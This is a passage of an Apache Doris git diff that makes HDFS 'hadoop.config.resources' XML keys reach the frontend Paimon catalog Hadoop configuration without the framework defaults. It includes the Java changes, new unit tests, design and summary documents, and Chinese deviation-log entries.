org.apache.hadoop.conf.Configuration} already carries every Hadoop default and because the + * defaults (notably the 62 {@code fs.s3a.*} entries from core-default.xml) would otherwise clobber a + * co-bound object-store provider's tuned {@code fs.s3a.*} values when merged into a multi-backend + * catalog Configuration. {@link #toMap()} (BE) keeps the defaults-laden set for byte-parity. + */ + @Override + public Map toHadoopConfigurationMap() { + return hadoopConfigProperties; + } + public boolean isKerberos() { return AUTH_KERBEROS.equalsIgnoreCase(hdfsAuthenticationType); } /** - * Builds the backend configuration key set. Faithful port of legacy + * Builds the HDFS configuration key set. Faithful port of legacy * {@code HdfsProperties.initBackendConfigProperties()} so the typed BE map stays at parity with fe-core * {@code getBackendConfigProperties()}. Overlay order (last-write-wins): config-resource XML files, then * the {@code hadoop./dfs./fs./juicefs.} pass-through from the raw map, then the synthesized keys. + * + * @param loadHadoopDefaults {@code true} for the BE map (defaults-laden, legacy parity); {@code false} + * for the FE catalog Hadoop-config map (only the XML files' own keys, no + * Hadoop framework defaults). Only the config-resource load differs; the + * overrides/synthesized keys are identical, so the two maps agree on every + * meaningful HDFS key and differ only in the inert framework defaults. */ - private Map buildBackendConfigProperties(Map origProps) { - Map props = HdfsConfigFileLoader.loadConfigMap(hadoopConfigResources); + private Map buildConfigProperties(Map origProps, boolean loadHadoopDefaults) { + Map props = HdfsConfigFileLoader.loadConfigMap(hadoopConfigResources, loadHadoopDefaults); Map userOverridden = extractUserOverriddenHdfsConfig(origProps); if (!userOverridden.isEmpty()) { props.putAll(userOverridden); diff --git a/fe/fe-filesystem/fe-filesystem-hdfs/src/test/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemPropertiesTest.java b/fe/fe-filesystem/fe-filesystem-hdfs/src/test/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemPropertiesTest.java index 56ea9c13710847..0f1499c0b8556a 100644 --- a/fe/fe-filesystem/fe-filesystem-hdfs/src/test/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemPropertiesTest.java +++ b/fe/fe-filesystem/fe-filesystem-hdfs/src/test/java/org/apache/doris/filesystem/hdfs/HdfsFileSystemPropertiesTest.java @@ -20,6 +20,7 @@ import org.apache.doris.filesystem.FileSystemType; import org.apache.doris.filesystem.properties.BackendStorageKind; import org.apache.doris.filesystem.properties.BackendStorageProperties; +import org.apache.doris.filesystem.properties.HadoopStorageProperties; import org.apache.doris.filesystem.properties.StorageKind; import org.junit.jupiter.api.Assertions; @@ -199,8 +200,9 @@ void classifiersMatchHdfs() { Assertions.assertEquals(StorageKind.HDFS_COMPATIBLE, p.kind()); Assertions.assertEquals(FileSystemType.HDFS, p.type()); Assertions.assertEquals(BackendStorageKind.HDFS, p.backendKind()); - // BE-only model: no Hadoop-config conversion is exposed (catalog path stays on raw pass-through). - Assertions.assertTrue(p.toHadoopProperties().isEmpty()); + // C2: HDFS now surfaces a Hadoop-config map so the paimon FE catalog-create Configuration picks up + // the hadoop.config.resources XML / HA / auth keys (was Optional.empty before the fix). + Assertions.assertTrue(p.toHadoopProperties().isPresent()); } @Test @@ -229,6 +231,89 @@ void xmlResourcesAreLoadedIntoBackendMap() throws IOException { } } + /** Returns the FE catalog-create Hadoop config map (C2). */ + private static Map hadoopMap(Map input) { + Optional h = HdfsFileSystemProperties.of(input).toHadoopProperties(); + Assertions.assertTrue(h.isPresent(), "HDFS must expose a Hadoop config map (C2)"); + return h.get().toHadoopConfigurationMap(); + } + + @Test + void xmlKeysReachHadoopConfigMap() throws IOException { + // C2 regression pin: a key that lives ONLY in the referenced XML (not a raw catalog prop, so it + // cannot ride the connector's raw fs./dfs./hadoop. passthrough) must reach the FE Hadoop config map. + // Pre-fix toHadoopProperties() was empty -> .get() throws -> RED. + Path dir = Files.createTempDirectory("hadoop_conf"); + Path xml = dir.resolve("hdfs-site.xml"); + Files.write(xml, + ("" + + "dfs.custom.keycustom-value" + + "").getBytes(StandardCharsets.UTF_8)); + String prev = HdfsConfigFileLoader.hadoopConfigDirOverride; + HdfsConfigFileLoader.hadoopConfigDirOverride = dir.toString() + "/"; + try { + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + in.put("hadoop.config.resources", "hdfs-site.xml"); + + Map out = hadoopMap(in); + Assertions.assertEquals("custom-value", out.get("dfs.custom.key")); + } finally { + HdfsConfigFileLoader.hadoopConfigDirOverride = prev; + } + } + + @Test + void hadoopConfigMapExcludesFrameworkDefaultsButBeMapKeepsThem() throws IOException { + // Clobber guard (encodes WHY): the FE Hadoop map must NOT carry Hadoop's built-in fs.s3a.* defaults + // (which would overwrite a co-bound object-store provider's tuned fs.s3a.path.style.access=true in a + // multi-backend merge). The BE map (toMap) DOES keep them, for byte-parity with the legacy backend + // set. Asserting both sides pins the deliberate FE/BE asymmetry. + Path dir = Files.createTempDirectory("hadoop_conf"); + Path xml = dir.resolve("hdfs-site.xml"); + Files.write(xml, + ("" + + "dfs.custom.keycustom-value" + + "").getBytes(StandardCharsets.UTF_8)); + String prev = HdfsConfigFileLoader.hadoopConfigDirOverride; + HdfsConfigFileLoader.hadoopConfigDirOverride = dir.toString() + "/"; + try { + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + in.put("hadoop.config.resources", "hdfs-site.xml"); + + Map feMap = hadoopMap(in); + Map beMapWithDefaults = beMap(in); + // FE map: defaults-free -> the framework fs.s3a.* defaults are absent. + Assertions.assertNull(feMap.get("fs.s3a.path.style.access"), + "FE Hadoop map must not carry the core-default.xml fs.s3a.* defaults (clobber guard)"); + Assertions.assertNull(feMap.get("fs.s3a.connection.maximum")); + // BE map: defaults-laden -> those same framework defaults are present (legacy byte-parity). + // Assert presence, not the exact default value (it is hadoop-version-dependent, e.g. the + // fs.s3a.connection.maximum default is 96 on hadoop 3.3.x but 500 on 3.4.x). + Assertions.assertNotNull(beMapWithDefaults.get("fs.s3a.path.style.access")); + Assertions.assertNotNull(beMapWithDefaults.get("fs.s3a.connection.maximum")); + Assertions.assertTrue(beMapWithDefaults.size() > feMap.size(), + "BE map (defaults-laden) must carry more keys than the defaults-free FE map"); + } finally { + HdfsConfigFileLoader.hadoopConfigDirOverride = prev; + } + } + + @Test + void hadoopConfigMapKeepsMeaningfulKeys() { + // Defaults-free does NOT mean empty: the synthesized HDFS keys + fs.defaultFS must survive in the + // FE Hadoop map even with no hadoop.config.resources (blank => loadConfigMap returns empty, then the + // synthesized keys are added; no framework defaults either way). + Map in = new HashMap<>(); + in.put("fs.defaultFS", "hdfs://nn:8020"); + Map out = hadoopMap(in); + Assertions.assertEquals("hdfs://nn:8020", out.get("fs.defaultFS")); + Assertions.assertEquals("simple", out.get("hdfs.security.authentication")); + Assertions.assertEquals("true", out.get("ipc.client.fallback-to-simple-auth-allowed")); + Assertions.assertNull(out.get("fs.s3a.path.style.access")); + } + @Test void provNameViaProvider() { // bind() routes through HdfsFileSystemProperties.of and yields the typed model. diff --git a/plan-doc/designs/FIX-C2-HDFS-XML-design.md b/plan-doc/designs/FIX-C2-HDFS-XML-design.md new file mode 100644 index 00000000000000..ab934b8cef7a03 --- /dev/null +++ b/plan-doc/designs/FIX-C2-HDFS-XML-design.md @@ -0,0 +1,241 @@ +# Problem + +P6 clean-room finding **C2** (MAJOR; classification: missing-port / regression on a live read path). + +A paimon catalog whose HDFS HA / connection topology lives **only** in a `hadoop.config.resources` +XML file (e.g. `hdfs-site.xml` declaring `dfs.nameservices` + per-nameservice namenodes + failover +proxy provider) **cannot resolve its nameservice** when created through the SPI plugin path for the +`filesystem` / `jdbc` flavors. At first metadata access the paimon SDK opens an HDFS `FileSystem` +against a Configuration that never parsed the XML, so an HA URI like `hdfs://ns1/warehouse` fails to +resolve `ns1`. + +Scope (wave-2 confirmed): the gap is strictly the **FE-side catalog-create Configuration**. The +**BE/scan path is NOT affected** — `PaimonScanPlanProvider.java:619-620` consumes +`sp.toBackendProperties().toMap()`, which for HDFS returns the full backend map *including* the +XML-loaded keys. Wave 2 **refuted** the wave-1 kerberos-by-alias sub-claim (the per-FS Configuration +auth marker is not load-bearing; JVM-global `UserGroupInformation.setConfiguration` from the +authenticator's first `doAs` governs SASL). **This fix addresses the XML-resource gap ONLY.** + +# Root Cause + +The FE catalog-create Configuration for `filesystem`/`jdbc` is built by +`PaimonCatalogFactory.buildHadoopConfiguration(props, storageHadoopConfig)` → +`applyStorageConfig(...)` (`PaimonCatalogFactory.java:247-298`), from two sources: + +1. `storageHadoopConfig` — assembled by `PaimonConnector.buildStorageHadoopConfig()` + (`PaimonConnector.java:222-228`) by iterating `ctx.getStorageProperties()` and merging each + `sp.toHadoopProperties().toHadoopConfigurationMap()`. +2. The connector-local `paimon.*` re-key + the **raw `fs.`/`dfs.`/`hadoop.` passthrough** + (`applyStorageConfig`, `PaimonCatalogFactory.java:287-297`), which copies those keys **verbatim**. + +For an HDFS-warehouse catalog: + +- **`HdfsFileSystemProperties` deliberately does NOT implement `HadoopStorageProperties`** (its class + "Scope note" javadoc, `HdfsFileSystemProperties.java:53-58`), so `sp.toHadoopProperties()` returns + `Optional.empty()`. HDFS therefore contributes **nothing** to `storageHadoopConfig`. +- The raw passthrough copies the **`hadoop.config.resources` key itself** verbatim, but a Hadoop + `Configuration` does **not** treat that key as a resource directive — it is a Doris-specific key. + **The XML contents are never loaded.** + +So inline `dfs.*` keys passed directly in the catalog properties still work (they ride the raw +passthrough), but an HA topology that lives only inside the referenced XML file is silently dropped. + +## Parity baseline + +Legacy `HdfsProperties.initNormalizeAndCheckProps()` (`HdfsProperties.java:126-138`) built the FE +Hadoop `Configuration` **directly from `backendConfigProperties`** (`new Configuration(); +backendConfigProperties.forEach(set)`), and the per-flavor builders overlaid it for filesystem/jdbc +**and hms** (`PaimonFileSystemMetaStoreProperties:44`, `PaimonJdbcMetaStoreProperties:117`, +`PaimonHMSMetaStoreProperties.buildHiveConfiguration:80-84` — all iterate all storage props and +`conf.addResource(sp.getHadoopStorageConfig())`). Only DLF filtered to OSS/OSS_HDFS +(`PaimonAliyunDLFMetaStoreProperties:90-96`). The typed `HdfsFileSystemProperties.backendConfigProperties` +(`:198-222`, exposed via `toMap()`) is a faithful line-for-line port of legacy +`initBackendConfigProperties()`, already loaded at bind time (the BE path uses it today). The only +thing missing is a way to surface the XML/HA/auth keys to the FE Hadoop-config pipeline. + +# Design + +## Decision: `HdfsFileSystemProperties implements HadoopStorageProperties`, returning a **defaults-free** Hadoop map. + +`toHadoopProperties()` returns `Optional.of(this)`; `toHadoopConfigurationMap()` returns the XML-loaded +keys + user `hadoop./dfs./fs./juicefs.` overrides + synthesized keys (`fs.defaultFS`, ipc fallback, +`hdfs.security.authentication`, kerberos, `hadoop.username`) — **WITHOUT** Hadoop's built-in framework +defaults. The connector code does not change (the existing `buildStorageHadoopConfig` loop already +consumes `toHadoopProperties()`). + +### Why defaults-free (the red-team's decisive finding) + +`HdfsConfigFileLoader.loadConfigMap` creates a `new Configuration()` (which loads `core-default.xml`) +and iterates **every** entry (`:88-101`). So when `hadoop.config.resources` is set, +`backendConfigProperties` carries ~323 keys, of which **62 are `fs.s3a.*` Hadoop defaults** +(`fs.s3a.path.style.access=false`, `fs.s3a.connection.maximum=96`, `fs.s3a.aws.credentials.provider=`, +…). `S3FileSystemProperties.toHadoopConfigurationMap()` emits those exact keys **unconditionally** +(`:321-324`: `connection.maximum` / `path.style.access`). `buildStorageHadoopConfig` does +`merged.putAll(...)` per provider (`PaimonConnector.java:223-226`), so for a **multi-backend** catalog +(object store + HDFS-with-XML) merged last-write-wins: if HDFS merges after S3, its +`fs.s3a.path.style.access=false` **clobbers** the S3/MinIO provider's tuned `true` → MinIO reads break. + +This is a **regression vs the current branch** (today HDFS contributes nothing to `storageHadoopConfig`, +so the object-store tuning is intact) — independent of any legacy `addResource`-vs-`set` argument. +Reachable by a Kerberized HMS paimon catalog (`hadoop.kerberos.principal` triggers +`HdfsFileSystemProvider.supports()`) carrying `hadoop.config.resources` + MinIO table data, or any +`dfs.nameservices`/`hdfs://`-scheme catalog co-bound with an object store. Narrow, but a silent +data-access failure. + +**Emitting the framework defaults serves no purpose** for the FE config — the base `new Configuration()` +in `buildHadoopConfiguration` (`PaimonCatalogFactory.java:249`) already supplies every Hadoop default. +The HDFS map only needs to contribute its *own* keys (XML + HA + auth). Dropping the defaults: +- removes the clobber entirely (the HDFS map no longer carries `fs.s3a.*`); +- is unambiguously safe vs legacy — whether legacy's `addResource` clobbered (then this is strictly + better) or preserved (then this matches), the result is correct either way; +- for a single-backend HDFS catalog (the common C2 target) yields the **identical final Configuration** + (base defaults + XML/synthesized keys). + +Implemented with `new Configuration(false)` (no default resources) when building the FE map. + +### BE map stays byte-identical + +`toMap()` (BE) keeps returning the **defaults-laden** `backendConfigProperties` — byte-parity with +legacy `getBackendConfigProperties()` is preserved (the BE builds `THdfsParams` from specific keys and +ignores the `fs.s3a.*` noise; the historical FE↔BE divergence hazards argue for not perturbing the BE +map). The FE and BE maps then differ **only** in the inert Hadoop framework defaults; every meaningful +HDFS key (`fs.defaultFS`, `dfs.*`, `hadoop.security.*`, `ipc.*`, the XML's own keys) is identical in +both. For HDFS, the FE Hadoop config and BE map carry the same *meaningful* set — the legacy invariant. + +## Cross-flavor reach + +`buildStorageHadoopConfig()` is computed once for all flavors. Per-flavor parity: + +| flavor | legacy HDFS overlay? | after fix | verdict | +|---|---|---|---| +| filesystem | yes | HDFS map → `buildHadoopConfiguration` | **parity — the C2 fix** | +| jdbc | yes | HDFS map → `buildHadoopConfiguration` | **parity** | +| hms | yes (`buildHiveConfiguration:80-84`) | HDFS map → HiveConf | **parity (bonus: closes the gap for HMS)** | +| dlf | no (OSS/OSS_HDFS only) | full `storageHadoopConfig` overlaid (`DlfMetaStorePropertiesImpl.toDlfCatalogConf:141`) | **deviation only for a DLF catalog that also binds HDFS — see Risk** | +| rest | n/a (Options-only) | `storageHadoopConfig` unused (`PaimonConnector:147-150`) | unaffected | + +Pure object-store / pure-S3 catalogs bind **no** `HdfsFileSystemProperties` +(`HdfsFileSystemProvider.supports()` needs `_STORAGE_TYPE_=HDFS` / an `hdfs|viewfs|ofs|jfs|oss`-scheme +`fs.defaultFS`/`HDFS_URI` / `dfs.nameservices` / `hadoop.kerberos.principal` — none present on an +`s3.*`/`AWS_*`/`oss.*` map) → byte-unchanged. + +# Implementation Plan + +## File 1 — `fe-filesystem-hdfs/.../HdfsConfigFileLoader.java` + +Add a `loadHadoopDefaults` overload; keep the existing 1-arg method delegating with `true` (BE +behavior unchanged): +```java +public static Map loadConfigMap(String resourcesPath) { + return loadConfigMap(resourcesPath, true); +} +public static Map loadConfigMap(String resourcesPath, boolean loadHadoopDefaults) { + ... + Configuration conf = new Configuration(loadHadoopDefaults); // false => only the named XML, no core-default.xml + ... +} +``` +(`loadConfigMap` has exactly one caller; `HdfsConfigBuilder` is a separate runtime path that does not +call it, so this is isolated.) + +## File 2 — `fe-filesystem-hdfs/.../HdfsFileSystemProperties.java` + +- `import ...HadoopStorageProperties;` + `implements FileSystemProperties, BackendStorageProperties, HadoopStorageProperties`. +- Refactor `buildBackendConfigProperties(origProps)` → `buildConfigProperties(origProps, boolean loadHadoopDefaults)` + (the only internal change: `loadConfigMap(hadoopConfigResources, loadHadoopDefaults)`). +- Constructor builds **two** immutable maps from the same logic: + - `backendConfigProperties = unmodifiable(buildConfigProperties(raw, true))` — BE (unchanged). + - `hadoopConfigProperties = unmodifiable(buildConfigProperties(raw, false))` — FE Hadoop (no defaults). +- `toHadoopProperties()` → `Optional.of(this)`; `toHadoopConfigurationMap()` → `return hadoopConfigProperties;`. +- Rewrite the class "Scope note" javadoc: it now implements `HadoopStorageProperties` to surface the + XML/HA/auth keys to the FE catalog Hadoop config (C2); the FE map is defaults-free to avoid clobbering + co-bound object-store keys, while `toMap()` stays defaults-laden for BE byte-parity; the real + `UGI.doAs` still lives in fe-core/ctx and this class builds no authenticator (K1). + +(`validate()` keeps calling `checkHaConfig(backendConfigProperties)` — the XML's HA keys are present in +both maps, so HA validation is unchanged.) + +## File 3 — stale comment-only updates (no logic change) + +These comments assert the now-false invariant "HDFS contributes nothing to `storageHadoopConfig` / +`toHadoopProperties`"; my change inverts it, so they must be corrected to avoid misleading the next +reader: `PaimonConnector.java:136-137` and `:219-220`; `PaimonCatalogFactory.java:240-242` and +`:281-283`; `MetaStoreParseUtils.java` HDFS-absent note. (REST remains correctly unaffected.) + +## Tests + +`HdfsFileSystemPropertiesTest` (fe-filesystem-hdfs): +1. Flip `classifiersMatchHdfs:203` `toHadoopProperties().isEmpty()` → `.isPresent()` + fix the comment. +2. `xmlKeysReachHadoopConfigMap` (new, mirrors `xmlResourcesAreLoadedIntoBackendMap:207-230`): the XML's + `dfs.custom.key` is present in `toHadoopProperties().get().toHadoopConfigurationMap()`. **C2 regression + pin** (RED pre-fix: `toHadoopProperties()` empty → `.get()` throws). +3. `hadoopConfigMapExcludesFrameworkDefaultsButBeMapKeepsThem` (new — the clobber guard, encodes WHY): + with `hadoop.config.resources` set, `toHadoopConfigurationMap()` does **NOT** contain + `fs.s3a.path.style.access` / `fs.s3a.connection.maximum` (framework defaults excluded), while + `toMap()` (BE) **does** (defaults-laden, BE parity). Pins both the clobber-safety and the FE/BE + asymmetry. (Replaces the tautological `toMap()==toHadoopConfigurationMap()` idea.) +4. `hadoopConfigMapKeepsMeaningfulKeys` (new): `toHadoopConfigurationMap()` still contains the XML key + + `fs.defaultFS` + `hdfs.security.authentication` (defaults-free ≠ empty). + +`PaimonCatalogFactoryTest` (connector) — close the end-to-end leg the red-team flagged: +5. `buildStorageHadoopConfigFoldsInHdfsHadoopMap` (new): a stub `StorageProperties`+`HadoopStorageProperties` + returning `{dfs.custom.key=v}` (a key NOT in the raw props, so it cannot ride the passthrough), placed + in a `RecordingConnectorContext.getStorageProperties()`, flows through + `PaimonConnector.buildStorageHadoopConfig()` → `PaimonCatalogFactory.buildHadoopConfiguration` and + `conf.get("dfs.custom.key")` is non-null. Requires: `RecordingConnectorContext` gains a + `storageProperties` field + `getStorageProperties()` override; `buildStorageHadoopConfig()` becomes + package-private (`// visible for testing`). Combined with the existing + `buildHadoopConfigurationAppliesStorageHadoopConfig`, this proves the full XML-key→Configuration chain. + +## E2E (gated — `enablePaimonTest=true`, NOT run here) + +A `filesystem`-flavor paimon catalog on HA HDFS (`hdfs://ns1/...`) with HA config supplied **only** via +`hadoop.config.resources=hdfs-site.xml` should `SHOW DATABASES`/`SELECT *` succeed. Pre-fix symptom: +nameservice `ns1` unresolved. + +# Risk Analysis + +## Blast radius — only `PaimonConnector` consumes `toHadoopProperties()` +Repo-wide, the only runtime caller of `.toHadoopProperties()` is `PaimonConnector:225` (every other hit +is a declaration/override/javadoc, and `grep 'instanceof HadoopStorageProperties'` = 0). fe-core / +iceberg / hive / hudi use the **separate** legacy `datasource.property.storage` hierarchy, untouched. + +## Multi-backend (object store + HDFS-with-XML) — the clobber, now fixed +The defaults-free FE map carries **no** `fs.s3a.*`, so it cannot overwrite a co-bound object-store +provider's tuned `fs.s3a.*` regardless of merge order. (See Design §Why defaults-free for the empirical +basis: a defaults-laden HDFS map *would* reset MinIO `fs.s3a.path.style.access` true→false.) The +defaults-free map is byte-equivalent to the legacy meaningful set for single-backend and strictly safer +for multi-backend. + +## DLF deviation — accepted +Legacy DLF overlaid only OSS/OSS_HDFS storage; the new `DlfMetaStorePropertiesImpl.toDlfCatalogConf` +overlays the full `storageHadoopConfig` (`:141`). After the fix, a DLF catalog that **also** binds an +`HdfsFileSystemProperties` would get HDFS keys in its DLF HiveConf. Triggers (per +`HdfsFileSystemProvider.supports()`): `dfs.nameservices`, an `hdfs|viewfs|ofs|jfs`-scheme bare +`fs.defaultFS`, `_STORAGE_TYPE_=HDFS`, or `hadoop.kerberos.principal`. A real DLF catalog uses +`oss.*`/`dlf.*` + `oss.hdfs.fs.defaultFS=oss://…` (not a bare `fs.defaultFS`), so this requires a +nonsensical DLF config; the result is additive/inert (defaults-free HDFS keys), never a credential or +correctness break. Documented as accepted in `deviations-log.md`. + +## Pre-existing (out of C2 scope) — `fs.hdfs.impl.disable.cache` +Legacy HDFS `getHadoopStorageConfig()` carried `fs.hdfs.impl.disable.cache=true` (via +`StorageProperties.ensureDisableCache`); the typed `backendConfigProperties` never adds it (it lives +only on `HdfsConfigBuilder`'s runtime `create()` path, `:44-48`). This is absent from the paimon HDFS +catalog Configuration **regardless of C2** (HDFS contributed nothing pre-fix), so it is a separate +pre-existing gap, not introduced or worsened here. Functional risk is low (FS-cache by scheme+authority+ugi +is benign). Noted for the deviations log / a possible follow-up; **not** folded into C2 (which is scoped +to the XML-resource gap). + +## Thread-safety / aliasing +Both maps are built once in the ctor as `Collections.unmodifiableMap`; the sole FE consumer copies via +`merged.putAll` into a method-local map, so the shared maps cannot be mutated. `loadConfigMap` creates a +fresh `Configuration` per call; the only static field (`hadoopConfigDirOverride`) is test-only. + +# Open Questions + +1. **DLF+HDFS-keys deviation** — recommend ACCEPT (nonsensical config, additive/inert). Sign off in + `deviations-log.md`. +2. **`fs.hdfs.impl.disable.cache` pre-existing gap** — recommend a separate follow-up (not C2). Flag in + `deviations-log.md`. +3. **HMS parity bonus** — the fix also closes the same XML gap for the HMS flavor (legacy overlaid HDFS + there too); this is parity, not scope creep. diff --git a/plan-doc/designs/FIX-C2-HDFS-XML-summary.md b/plan-doc/designs/FIX-C2-HDFS-XML-summary.md new file mode 100644 index 00000000000000..d5d1f57594ee50 --- /dev/null +++ b/plan-doc/designs/FIX-C2-HDFS-XML-summary.md @@ -0,0 +1,62 @@ +# Summary — FIX-C2-HDFS-XML + +## Problem + +P6 clean-room finding **C2** (MAJOR). A paimon catalog whose HDFS HA topology lives **only** in a +`hadoop.config.resources` XML file could not resolve its nameservice on the SPI plugin path +(filesystem/jdbc flavors): the FE catalog-create `Configuration` copied the `hadoop.config.resources` +key verbatim but never loaded the XML contents, so `hdfs://ns1/...` failed to resolve `ns1`. (BE/scan +path was unaffected — it already consumes the XML-loaded `toBackendProperties().toMap()`.) + +## Root Cause + +`HdfsFileSystemProperties` deliberately did **not** implement `HadoopStorageProperties`, so its +`toHadoopProperties()` returned `Optional.empty()` and HDFS contributed nothing to the connector's +`buildStorageHadoopConfig()` → FE Configuration. The XML keys (already parsed into +`backendConfigProperties` at bind time for the BE path) never reached the FE config. + +## Fix + +`HdfsFileSystemProperties implements HadoopStorageProperties`: +- `toHadoopProperties()` → `Optional.of(this)`. +- `toHadoopConfigurationMap()` → a **defaults-free** FE map (built via `new Configuration(false)`): + the XML keys + user `hadoop./dfs./fs./juicefs.` overrides + synthesized `fs.defaultFS`/ipc/auth/ + kerberos keys, but **without** Hadoop's 359 framework defaults. +- `toMap()` (BE) keeps the **defaults-laden** map for byte-parity with legacy `getBackendConfigProperties()`. + +**Why defaults-free** (the design red-team's decisive finding, empirically verified on hadoop 3.4.2): +`new Configuration()` carries 62 `fs.s3a.*` defaults (`path.style.access=false`, `connection.maximum=500`, +…). A naive "return `backendConfigProperties`" would inject those into the shared `storageHadoopConfig` +and, in a multi-backend catalog (object store + HDFS-with-XML), **clobber** a co-bound S3/MinIO +provider's tuned `fs.s3a.path.style.access=true` → MinIO reads break. A **regression vs the current +branch** (where HDFS contributes nothing). The defaults belong to the base `Configuration` anyway, so +the FE map only contributes HDFS's own keys. + +Per-flavor: parity for filesystem/jdbc (the C2 fix) and hms (legacy overlaid HDFS too); a documented, +accepted, barely-reachable deviation for DLF (`DV-036`); REST unaffected. Single-backend HDFS yields an +identical final Configuration. + +Also updated 4 stale comments (`PaimonConnector`, `PaimonCatalogFactory`, `MetaStoreParseUtils`, +`ConnectorContext`) that asserted the now-false "HDFS contributes nothing to storageHadoopConfig". + +## Tests + +- `HdfsFileSystemPropertiesTest`: flipped `classifiersMatchHdfs` (`toHadoopProperties().isEmpty()`→ + `.isPresent()`, RED pre-fix); added `xmlKeysReachHadoopConfigMap` (C2 regression pin — an XML-only key + reaches the FE map), `hadoopConfigMapExcludesFrameworkDefaultsButBeMapKeepsThem` (clobber guard + + FE/BE asymmetry), `hadoopConfigMapKeepsMeaningfulKeys` (defaults-free ≠ empty). +- `PaimonCatalogFactoryTest.buildStorageHadoopConfigFoldsInHdfsHadoopMap`: end-to-end seam — a stub + storage prop's `toHadoopConfigurationMap()` key (absent from raw props) flows through + `buildStorageHadoopConfig()` → `buildHadoopConfiguration` into the `Configuration`. Required making + `buildStorageHadoopConfig()` package-private + a `getStorageProperties()` seam on + `RecordingConnectorContext`. + +## Result + +- fe-filesystem-hdfs full suite: **GREEN** (`HdfsFileSystemPropertiesTest` 28/28). +- fe-connector-paimon full suite: **279/0/1-skip** (skip = gated `PaimonLiveConnectivityTest`). +- fe-connector-spi compile + checkstyle: **GREEN**. Connector import-restriction check: **GREEN**. +- Process: one design red-team (6 agents) + one adversarial impl-verification (empirically re-validated + the defaults-free claim against hadoop-common-3.4.2). +- **Docker e2e (`enablePaimonTest=true`): NOT run (gated).** +- Deviations recorded: `DV-036` (DLF+HDFS), `DV-037` (`fs.hdfs.impl.disable.cache` pre-existing gap). diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index 0382fd24475b78..c4b51bcd6302f4 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -57,6 +57,25 @@ ## 详细记录(时间倒序) +### DV-037 — P6-C2 FIX-C2-HDFS-XML:legacy HDFS `getHadoopStorageConfig()` 的 `fs.hdfs.impl.disable.cache=true` 未进 typed FE Configuration(pre-existing,非 C2 引入) +- **状态**:🟢 已登记(accept / 可转 follow-up)|**日期**:2026-06-19|**签字**:待用户 +- **原计划位置**:[FIX-C2-HDFS-XML-design.md §Risk](./designs/FIX-C2-HDFS-XML-design.md) +- **偏差描述**:legacy `HdfsProperties` 的 FE `getHadoopStorageConfig()` 带 `fs.hdfs.impl.disable.cache=true`(`StorageProperties.ensureDisableCache`),typed `HdfsFileSystemProperties.backendConfigProperties` 从不加它(该键只在 `HdfsConfigBuilder` 运行期 `create()` 路上,`:44-48`)。 +- **触发场景**:任何 paimon HDFS catalog 的 FE catalog-create Configuration——**与 C2 无关**:翻闸后 HDFS 本就对 `storageHadoopConfig` 零贡献,C2 前后该键都缺;C2 只补 XML 子项,不动此键。 +- **新方案**:accept。Hadoop FS-cache 按 scheme+authority+ugi 缓存,benign;不在 C2(XML-resource gap)scope 内。 +- **影响范围**:代码无(pre-existing)。可转独立 follow-up(若将来报 FS-cache 串扰)。 +- **关联**:[task-list §P6-C2](./task-list-P6-fixes.md)、[DV-036] + +### DV-036 — P6-C2 FIX-C2-HDFS-XML:DLF catalog 若另绑 HDFS storage,HDFS keys 会进 DLF HiveConf(legacy DLF 只 overlay OSS/OSS_HDFS) +- **状态**:🟢 已登记(accept)|**日期**:2026-06-19|**签字**:待用户 +- **原计划位置**:[FIX-C2-HDFS-XML-design.md §Risk / Open Q1](./designs/FIX-C2-HDFS-XML-design.md) +- **偏差描述**:`HdfsFileSystemProperties` 实现 `HadoopStorageProperties` 后,`buildStorageHadoopConfig()` 对所有 flavor 共享;legacy DLF(`PaimonAliyunDLFMetaStoreProperties:90-96`)只 overlay OSS/OSS_HDFS storage,新 `DlfMetaStorePropertiesImpl.toDlfCatalogConf:141` 无条件 overlay 整个 `storageHadoopConfig`。故 DLF catalog 若也绑了 `HdfsFileSystemProperties`,HDFS keys 会进 DLF HiveConf。 +- **触发场景**:DLF catalog 的 raw props 触发 `HdfsFileSystemProvider.supports()`(`dfs.nameservices` / `hdfs|viewfs|ofs|jfs`-scheme 裸 `fs.defaultFS` / `_STORAGE_TYPE_=HDFS` / `hadoop.kerberos.principal`)——对 Aliyun-OSS 的 DLF 是 nonsensical 配置(真 DLF 用 `oss.*`/`dlf.*` + `oss.hdfs.fs.defaultFS=oss://…`,非裸 `fs.defaultFS`)。 +- **新方案**:accept。结果是 additive/inert 的 defaults-free HDFS keys,绝不破凭据/正确性;纯-OSS DLF(真实场景)byte-unchanged。修它需动 out-of-scope 的 DLF 路加 HDFS filter 去守一个 nonsensical 配置,不值。 +- **替代方案**:DLF 路按 storage 类型 filter——拒(C2 不含 DLF;增复杂度守不可达场景)。 +- **影响范围**:代码无(accept)。文档:本条 + 设计 Open Q1。 +- **关联**:[task-list §P6-C2](./task-list-P6-fixes.md)、[DV-037] + ### DV-035 — P4 MINOR/NIT cleanup:15 项 accept-as-deviation(M5.1 transient-only + 14 display/perf/text/inert/连接器-更-correct/假前提) - **状态**:🟢 已登记(accept)|**日期**:2026-06-12|**签字**:用户 [D-057] - **范围**:review §5/§7 去重 ~17 项 P4 MINOR/NIT 中,2 项已修(N10.1 `bcee91dcb52`、sentinel `4b2c2190dc2`,见 [D-057]),余 15 项 accept。完整逐项分类见索引表 DV-035 行;要点: diff --git a/plan-doc/task-list-P6-fixes.md b/plan-doc/task-list-P6-fixes.md index 636e5eec69fcd6..de9b5a66fab914 100644 --- a/plan-doc/task-list-P6-fixes.md +++ b/plan-doc/task-list-P6-fixes.md @@ -11,9 +11,13 @@ (region `us-east-1`, tuning 100/10000/10000 via gated normalize hook). 28/0/0 UT (FE `fs.s3.impl`/`fs.s3a.*` + BE `AWS_*` + tuning-preserve + s3-outranks-minio precedence). `s3.*` path byte-unchanged. e2e gated/not-run. Decision: PRESERVE tuning defaults (red-team refuted the "accept deviation" pass). See FIX-C1-MINIO-{design,summary}.md. -- [ ] **P6-C2** HDFS `hadoop.config.resources` XML into FE catalog-create Configuration (MAJOR) - — filesystem/jdbc flavor; recommend `HdfsFileSystemProperties` expose its already-XML-loaded backend map. - **XML-resource gap ONLY** (kerberos-by-alias sub-claim was refuted: per-FS auth marker non-load-bearing). +- [x] **P6-C2** HDFS 